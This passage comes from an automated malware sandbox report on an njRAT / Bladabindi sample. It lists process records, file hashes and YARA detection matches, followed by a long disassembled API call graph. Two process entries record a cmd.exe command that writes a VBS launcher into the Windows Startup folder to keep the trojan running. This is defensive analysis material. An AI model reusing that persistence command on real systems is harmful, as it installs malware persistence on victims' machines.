                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:17:11:58
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:17:11:58
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:17:11:59
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:17:12:07
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:17:12:07
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:17:12:07
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:17:12:11
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:10.9%
                                                                        Total number of Nodes:1147
                                                                        Total number of Limit Nodes:13
4038f1 CopyRect 3382->3383 3384 404360 7 API calls 3383->3384 3385 403911 CopyRect 3384->3385 3386 404360 7 API calls 3385->3386 3387 403931 CopyRect 3386->3387 3388 403e10 7 API calls 3387->3388 3389 403951 CopyRect 3388->3389 3390 404360 7 API calls 3389->3390 3391 403971 CopyRect 3390->3391 3392 404360 7 API calls 3391->3392 3393 403991 CopyRect 3392->3393 3394 404360 7 API calls 3393->3394 3395 4039b1 SetWindowRgn SetCapture 3394->3395 3395->3063 3396->3069 3397->3073 3398->3077 3399->3081 3400->3085 3401->3089 3402->3093 3403->3097 3404->3101 3405->3105 3406->3109 3407->3113 3408->3117 3409->3121 3410->3125 3411->3129 3412->3133 3413->3137 3414->3141 3415->3145 3416->3149 3417->3153 3418->3157 3419->3161 3420->3165 3421->3169 3422->3173 3423->3177 3424->3181 3425->3185 3426->3189 3427->3193 3428->3197 3429->3201 3430->3205 3431->3209 3432->3213 3433->3217 3434->3221 3435->3225 3436->3229 3437->3233 3438->3237 3439->3241 3440->3245 3441->3249 3442->3253 3443->3257 3444->3261 3445->3265 3446->3269 3447->3273 3448->3277 3449->3281 3450->3285 3451->3289 3452->3293 3453->3297 3454->3301 3455->3305 3456->3309 3457->3313 3458->3317 3459->3321 3460->3325 3461->3329 3462->3333 3463->3337 3464->3341 3467 4043a3 3465->3467 3466 40454a 3468 404560 CreatePolygonRgn 3466->3468 3469 4045cb CreatePolygonRgn 3466->3469 3467->3466 3471 4044e9 _ftol _ftol 3467->3471 3470 404570 3468->3470 3475 4045d9 3469->3475 3472 40457b CombineRgn CreatePolygonRgn 3470->3472 3471->3466 3471->3471 3473 40ae02 3472->3473 3474 40459f CombineRgn 3473->3474 3474->3475 3475->3347 3477 40a940 GetWindowRect 3478 40aa54 ClientToScreen 3477->3478 3479 40a99f 3477->3479 3481 40aa52 3478->3481 3479->3481 3489 4052c0 CopyRect 3479->3489 3482 40a9d0 _ftol 3482->3481 3483 40a9ec 3482->3483 3483->3481 3484 40aa08 GetWindowRect 3483->3484 3485 40aa1f 3484->3485 3486 405300 42 API calls 3485->3486 3487 40aa30 SetWindowRgn 3486->3487 3490 40a440 IsIconic 3487->3490 3489->3482 3491 40a474 3490->3491 3493 40a50d 
3490->3493 3492 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3491->3492 3501 40a508 3492->3501 3497 40a5b2 LPtoDP 3493->3497 3493->3501 3503 40a640 3493->3503 3494 40a65a GetWindowRect 3495 40a67d 3494->3495 3504 404a40 CopyRect 3495->3504 3498 40a5e5 3497->3498 3499 40a5fd GetMapMode 3498->3499 3500 40b054 3499->3500 3502 40a616 DPtoLP 3500->3502 3501->3481 3502->3503 3503->3494 3505 4039c0 3 API calls 3504->3505 3506 404a71 CopyRect 3505->3506 3507 4039c0 3 API calls 3506->3507 3508 404a91 CopyRect 3507->3508 3509 4039c0 3 API calls 3508->3509 3510 404ab1 CopyRect 3509->3510 3511 4039c0 3 API calls 3510->3511 3512 404ad1 CopyRect 3511->3512 3513 4039c0 3 API calls 3512->3513 3514 404af1 CopyRect 3513->3514 3515 4039c0 3 API calls 3514->3515 3516 404b11 CopyRect 3515->3516 3517 4039c0 3 API calls 3516->3517 3518 404b31 CopyRect 3517->3518 3519 4039c0 3 API calls 3518->3519 3520 404b51 CopyRect 3519->3520 3521 4039c0 3 API calls 3520->3521 3522 404b71 CopyRect 3521->3522 3523 4039c0 3 API calls 3522->3523 3524 404b91 CopyRect 3523->3524 3525 4039c0 3 API calls 3524->3525 3526 404bb1 CopyRect 3525->3526 3527 4039c0 3 API calls 3526->3527 3528 404bd1 CopyRect 3527->3528 3529 4039c0 3 API calls 3528->3529 3530 404bf1 CopyRect 3529->3530 3531 4039c0 3 API calls 3530->3531 3532 404c11 CopyRect 3531->3532 3533 4039c0 3 API calls 3532->3533 3534 404c31 CopyRect 3533->3534 3535 4039c0 3 API calls 3534->3535 3536 404c51 CopyRect 3535->3536 3537 4039c0 3 API calls 3536->3537 3538 404c71 CopyRect 3537->3538 3539 4039c0 3 API calls 3538->3539 3540 404c91 CopyRect 3539->3540 3541 4039c0 3 API calls 3540->3541 3542 404cb1 CopyRect 3541->3542 3543 4039c0 3 API calls 3542->3543 3544 404cd1 CopyRect 3543->3544 3545 4039c0 3 API calls 3544->3545 3546 404cf1 CopyRect 3545->3546 3547 4039c0 3 API calls 3546->3547 3548 404d11 CopyRect 3547->3548 3549 4039c0 3 API calls 3548->3549 3550 404d31 CopyRect 3549->3550 3551 4039c0 3 API calls 3550->3551 3552 
404d51 CopyRect 3551->3552 3553 4039c0 3 API calls 3552->3553 3554 404d71 CopyRect 3553->3554 3555 4039c0 3 API calls 3554->3555 3556 404d91 CopyRect 3555->3556 3557 4039c0 3 API calls 3556->3557 3558 404db1 CopyRect 3557->3558 3559 4039c0 3 API calls 3558->3559 3560 404dd1 CopyRect 3559->3560 3561 4039c0 3 API calls 3560->3561 3562 404df1 CopyRect 3561->3562 3563 4039c0 3 API calls 3562->3563 3564 404e11 CopyRect 3563->3564 3565 4039c0 3 API calls 3564->3565 3566 404e31 CopyRect 3565->3566 3567 4039c0 3 API calls 3566->3567 3568 404e51 CopyRect 3567->3568 3569 4039c0 3 API calls 3568->3569 3570 404e71 CopyRect 3569->3570 3571 4039c0 3 API calls 3570->3571 3572 404e91 CopyRect 3571->3572 3573 4039c0 3 API calls 3572->3573 3574 404eb1 3573->3574 3574->3501 3576 40ad00 DrawTextA 2570 40b10f __set_app_type __p__fmode __p__commode 2571 40b17e 2570->2571 2572 40b192 2571->2572 2573 40b186 __setusermatherr 2571->2573 2582 40b280 _controlfp 2572->2582 2573->2572 2575 40b197 _initterm __getmainargs _initterm 2576 40b1eb GetStartupInfoA 2575->2576 2578 40b21f GetModuleHandleA 2576->2578 2583 40b2a2 6CDC4ED0 2578->2583 2581 40b243 exit _XcptFilter 2582->2575 2583->2581 2584 40ac50 TextOutA 2586 40ac10 PtVisible 2587 40a810 2591 409c60 2587->2591 2589 40a838 ReleaseCapture GetWindowRect 2590 40a863 2589->2590 2592 409c6c 2591->2592 2592->2589 3590 40a190 3591 40a198 ReleaseCapture 3590->3591 2593 409e20 2596 409e47 2593->2596 2594 409f76 GetWindowRect 2595 409f99 2594->2595 2605 401040 CopyRect 2595->2605 2598 409ece LPtoDP 2596->2598 2603 409f5c 2596->2603 2599 409f01 2598->2599 2600 409f19 GetMapMode 2599->2600 2601 40b054 2600->2601 2602 409f32 DPtoLP 2601->2602 2602->2603 2603->2594 2604 409fab 2936 4039c0 2605->2936 2607 401071 CopyRect 2942 404670 2607->2942 2609 401091 CopyRect 2610 4039c0 3 API calls 2609->2610 2611 4010b1 CopyRect 2610->2611 2612 404670 3 API calls 2611->2612 2613 4010d1 CopyRect 2612->2613 2614 4039c0 3 API calls 2613->2614 2615 4010f1 CopyRect 
2614->2615 2616 404670 3 API calls 2615->2616 2617 401111 CopyRect 2616->2617 2618 4039c0 3 API calls 2617->2618 2619 401131 CopyRect 2618->2619 2620 404670 3 API calls 2619->2620 2621 401151 CopyRect 2620->2621 2622 4039c0 3 API calls 2621->2622 2623 401171 CopyRect 2622->2623 2624 404670 3 API calls 2623->2624 2625 401191 CopyRect 2624->2625 2626 4039c0 3 API calls 2625->2626 2627 4011b1 CopyRect 2626->2627 2628 404670 3 API calls 2627->2628 2629 4011d1 CopyRect 2628->2629 2630 4039c0 3 API calls 2629->2630 2631 4011f1 CopyRect 2630->2631 2632 404670 3 API calls 2631->2632 2633 401211 CopyRect 2632->2633 2634 4039c0 3 API calls 2633->2634 2635 401231 CopyRect 2634->2635 2636 404670 3 API calls 2635->2636 2637 401251 CopyRect 2636->2637 2638 4039c0 3 API calls 2637->2638 2639 401271 CopyRect 2638->2639 2640 404670 3 API calls 2639->2640 2641 401291 CopyRect 2640->2641 2642 4039c0 3 API calls 2641->2642 2643 4012b1 CopyRect 2642->2643 2644 404670 3 API calls 2643->2644 2645 4012d1 CopyRect 2644->2645 2646 4039c0 3 API calls 2645->2646 2647 4012f1 CopyRect 2646->2647 2648 404670 3 API calls 2647->2648 2649 401311 CopyRect 2648->2649 2650 4039c0 3 API calls 2649->2650 2651 401331 CopyRect 2650->2651 2652 404670 3 API calls 2651->2652 2653 401351 CopyRect 2652->2653 2654 4039c0 3 API calls 2653->2654 2655 401371 CopyRect 2654->2655 2656 404670 3 API calls 2655->2656 2657 401391 CopyRect 2656->2657 2658 4039c0 3 API calls 2657->2658 2659 4013b1 CopyRect 2658->2659 2660 404670 3 API calls 2659->2660 2661 4013d1 CopyRect 2660->2661 2662 4039c0 3 API calls 2661->2662 2663 4013f1 CopyRect 2662->2663 2664 404670 3 API calls 2663->2664 2665 401411 CopyRect 2664->2665 2666 4039c0 3 API calls 2665->2666 2667 401431 CopyRect 2666->2667 2668 404670 3 API calls 2667->2668 2669 401451 CopyRect 2668->2669 2670 4039c0 3 API calls 2669->2670 2671 401471 CopyRect 2670->2671 2672 404670 3 API calls 2671->2672 2673 401491 CopyRect 2672->2673 2674 4039c0 3 API calls 2673->2674 2675 
4014b1 CopyRect 2674->2675 2676 404670 3 API calls 2675->2676 2677 4014d1 CopyRect 2676->2677 2678 4039c0 3 API calls 2677->2678 2679 4014f1 CopyRect 2678->2679 2680 404670 3 API calls 2679->2680 2681 401511 CopyRect 2680->2681 2682 4039c0 3 API calls 2681->2682 2683 401531 CopyRect 2682->2683 2684 404670 3 API calls 2683->2684 2685 401551 CopyRect 2684->2685 2686 4039c0 3 API calls 2685->2686 2687 401571 CopyRect 2686->2687 2688 404670 3 API calls 2687->2688 2689 401591 CopyRect 2688->2689 2690 4039c0 3 API calls 2689->2690 2691 4015b1 CopyRect 2690->2691 2692 404670 3 API calls 2691->2692 2693 4015d1 CopyRect 2692->2693 2694 4039c0 3 API calls 2693->2694 2695 4015f1 CopyRect 2694->2695 2696 404670 3 API calls 2695->2696 2697 401611 CopyRect 2696->2697 2698 4039c0 3 API calls 2697->2698 2699 401631 CopyRect 2698->2699 2700 404670 3 API calls 2699->2700 2701 401651 CopyRect 2700->2701 2702 4039c0 3 API calls 2701->2702 2703 401671 CopyRect 2702->2703 2704 404670 3 API calls 2703->2704 2705 401691 CopyRect 2704->2705 2706 4039c0 3 API calls 2705->2706 2707 4016b1 CopyRect 2706->2707 2708 404670 3 API calls 2707->2708 2709 4016d1 CopyRect 2708->2709 2710 4039c0 3 API calls 2709->2710 2711 4016f1 CopyRect 2710->2711 2712 404670 3 API calls 2711->2712 2713 401711 CopyRect 2712->2713 2714 4039c0 3 API calls 2713->2714 2715 401731 CopyRect 2714->2715 2716 404670 3 API calls 2715->2716 2717 401751 CopyRect 2716->2717 2718 4039c0 3 API calls 2717->2718 2719 401771 CopyRect 2718->2719 2720 404670 3 API calls 2719->2720 2721 401791 CopyRect 2720->2721 2722 4039c0 3 API calls 2721->2722 2723 4017b1 CopyRect 2722->2723 2724 404670 3 API calls 2723->2724 2725 4017d1 CopyRect 2724->2725 2726 4039c0 3 API calls 2725->2726 2727 4017f1 CopyRect 2726->2727 2728 404670 3 API calls 2727->2728 2729 401811 CopyRect 2728->2729 2730 4039c0 3 API calls 2729->2730 2731 401831 CopyRect 2730->2731 2732 404670 3 API calls 2731->2732 2733 401851 CopyRect 2732->2733 2734 4039c0 3 API calls 
2733->2734 2735 401871 CopyRect 2734->2735 2736 404670 3 API calls 2735->2736 2737 401891 CopyRect 2736->2737 2738 4039c0 3 API calls 2737->2738 2739 4018b1 CopyRect 2738->2739 2740 404670 3 API calls 2739->2740 2741 4018d1 CopyRect 2740->2741 2742 4039c0 3 API calls 2741->2742 2743 4018f1 CopyRect 2742->2743 2744 404670 3 API calls 2743->2744 2745 401911 CopyRect 2744->2745 2746 4039c0 3 API calls 2745->2746 2747 401931 CopyRect 2746->2747 2748 404670 3 API calls 2747->2748 2749 401951 CopyRect 2748->2749 2750 4039c0 3 API calls 2749->2750 2751 401971 CopyRect 2750->2751 2752 404670 3 API calls 2751->2752 2753 401991 CopyRect 2752->2753 2754 4039c0 3 API calls 2753->2754 2755 4019b1 CopyRect 2754->2755 2756 404670 3 API calls 2755->2756 2757 4019d1 CopyRect 2756->2757 2758 4039c0 3 API calls 2757->2758 2759 4019f1 CopyRect 2758->2759 2760 404670 3 API calls 2759->2760 2761 401a11 CopyRect 2760->2761 2762 4039c0 3 API calls 2761->2762 2763 401a31 CopyRect 2762->2763 2764 404670 3 API calls 2763->2764 2765 401a51 CopyRect 2764->2765 2766 4039c0 3 API calls 2765->2766 2767 401a71 CopyRect 2766->2767 2768 404670 3 API calls 2767->2768 2769 401a91 CopyRect 2768->2769 2770 4039c0 3 API calls 2769->2770 2771 401ab1 CopyRect 2770->2771 2772 404670 3 API calls 2771->2772 2773 401ad1 CopyRect 2772->2773 2774 4039c0 3 API calls 2773->2774 2775 401af1 CopyRect 2774->2775 2776 404670 3 API calls 2775->2776 2777 401b11 CopyRect 2776->2777 2778 4039c0 3 API calls 2777->2778 2779 401b31 CopyRect 2778->2779 2780 404670 3 API calls 2779->2780 2781 401b51 CopyRect 2780->2781 2782 4039c0 3 API calls 2781->2782 2783 401b71 CopyRect 2782->2783 2784 404670 3 API calls 2783->2784 2785 401b91 CopyRect 2784->2785 2786 4039c0 3 API calls 2785->2786 2787 401bb1 CopyRect 2786->2787 2788 404670 3 API calls 2787->2788 2789 401bd1 CopyRect 2788->2789 2790 4039c0 3 API calls 2789->2790 2791 401bf1 CopyRect 2790->2791 2792 404670 3 API calls 2791->2792 2793 401c11 CopyRect 2792->2793 2794 4039c0 3 
API calls 2793->2794 2795 401c31 CopyRect 2794->2795 2796 404670 3 API calls 2795->2796 2797 401c51 CopyRect 2796->2797 2798 4039c0 3 API calls 2797->2798 2799 401c71 CopyRect 2798->2799 2800 404670 3 API calls 2799->2800 2801 401c91 CopyRect 2800->2801 2802 4039c0 3 API calls 2801->2802 2803 401cb1 CopyRect 2802->2803 2804 404670 3 API calls 2803->2804 2805 401cd1 CopyRect 2804->2805 2806 4039c0 3 API calls 2805->2806 2807 401cf1 CopyRect 2806->2807 2808 404670 3 API calls 2807->2808 2809 401d11 CopyRect 2808->2809 2810 4039c0 3 API calls 2809->2810 2811 401d31 CopyRect 2810->2811 2812 404670 3 API calls 2811->2812 2813 401d51 CopyRect 2812->2813 2814 4039c0 3 API calls 2813->2814 2815 401d71 CopyRect 2814->2815 2816 404670 3 API calls 2815->2816 2817 401d91 CopyRect 2816->2817 2818 4039c0 3 API calls 2817->2818 2819 401db1 CopyRect 2818->2819 2820 404670 3 API calls 2819->2820 2821 401dd1 CopyRect 2820->2821 2822 4039c0 3 API calls 2821->2822 2823 401df1 CopyRect 2822->2823 2824 404670 3 API calls 2823->2824 2825 401e11 CopyRect 2824->2825 2826 4039c0 3 API calls 2825->2826 2827 401e31 CopyRect 2826->2827 2828 404670 3 API calls 2827->2828 2829 401e51 CopyRect 2828->2829 2830 4039c0 3 API calls 2829->2830 2831 401e71 CopyRect 2830->2831 2832 404670 3 API calls 2831->2832 2833 401e91 CopyRect 2832->2833 2834 4039c0 3 API calls 2833->2834 2835 401eb1 CopyRect 2834->2835 2836 404670 3 API calls 2835->2836 2837 401ed1 CopyRect 2836->2837 2838 4039c0 3 API calls 2837->2838 2839 401ef1 CopyRect 2838->2839 2840 404670 3 API calls 2839->2840 2841 401f11 CopyRect 2840->2841 2842 4039c0 3 API calls 2841->2842 2843 401f31 CopyRect 2842->2843 2844 404670 3 API calls 2843->2844 2845 401f51 CopyRect 2844->2845 2846 4039c0 3 API calls 2845->2846 2847 401f71 CopyRect 2846->2847 2848 404670 3 API calls 2847->2848 2849 401f91 CopyRect 2848->2849 2850 4039c0 3 API calls 2849->2850 2851 401fb1 CopyRect 2850->2851 2852 404670 3 API calls 2851->2852 2853 401fd1 CopyRect 2852->2853 
2854 4039c0 3 API calls 2853->2854 2855 401ff1 CopyRect 2854->2855 2856 404670 3 API calls 2855->2856 2857 402011 CopyRect 2856->2857 2858 4039c0 3 API calls 2857->2858 2859 402031 CopyRect 2858->2859 2860 404670 3 API calls 2859->2860 2861 402051 CopyRect 2860->2861 2862 4039c0 3 API calls 2861->2862 2863 402071 CopyRect 2862->2863 2864 404670 3 API calls 2863->2864 2865 402091 CopyRect 2864->2865 2866 4039c0 3 API calls 2865->2866 2867 4020b1 CopyRect 2866->2867 2868 404670 3 API calls 2867->2868 2869 4020d1 CopyRect 2868->2869 2870 4039c0 3 API calls 2869->2870 2871 4020f1 CopyRect 2870->2871 2872 404670 3 API calls 2871->2872 2873 402111 CopyRect 2872->2873 2874 4039c0 3 API calls 2873->2874 2875 402131 CopyRect 2874->2875 2876 404670 3 API calls 2875->2876 2877 402151 CopyRect 2876->2877 2878 4039c0 3 API calls 2877->2878 2879 402171 CopyRect 2878->2879 2880 404670 3 API calls 2879->2880 2881 402191 CopyRect 2880->2881 2882 4039c0 3 API calls 2881->2882 2883 4021b1 CopyRect 2882->2883 2884 4039c0 3 API calls 2883->2884 2885 4021d1 CopyRect 2884->2885 2948 4040f0 2885->2948 2887 4021f1 CopyRect 2888 4039c0 3 API calls 2887->2888 2889 402211 CopyRect 2888->2889 2890 4040f0 3 API calls 2889->2890 2891 402231 CopyRect 2890->2891 2892 4039c0 3 API calls 2891->2892 2893 402251 CopyRect 2892->2893 2894 4040f0 3 API calls 2893->2894 2895 402271 CopyRect 2894->2895 2896 4040f0 3 API calls 2895->2896 2897 402291 CopyRect 2896->2897 2898 4039c0 3 API calls 2897->2898 2899 4022b1 CopyRect 2898->2899 2900 4040f0 3 API calls 2899->2900 2901 4022d1 CopyRect 2900->2901 2902 4039c0 3 API calls 2901->2902 2903 4022f1 CopyRect 2902->2903 2904 4040f0 3 API calls 2903->2904 2905 402311 CopyRect 2904->2905 2906 4039c0 3 API calls 2905->2906 2907 402331 CopyRect 2906->2907 2908 4040f0 3 API calls 2907->2908 2909 402351 CopyRect 2908->2909 2910 4040f0 3 API calls 2909->2910 2911 402371 CopyRect 2910->2911 2912 4040f0 3 API calls 2911->2912 2913 402391 CopyRect 2912->2913 2914 4039c0 
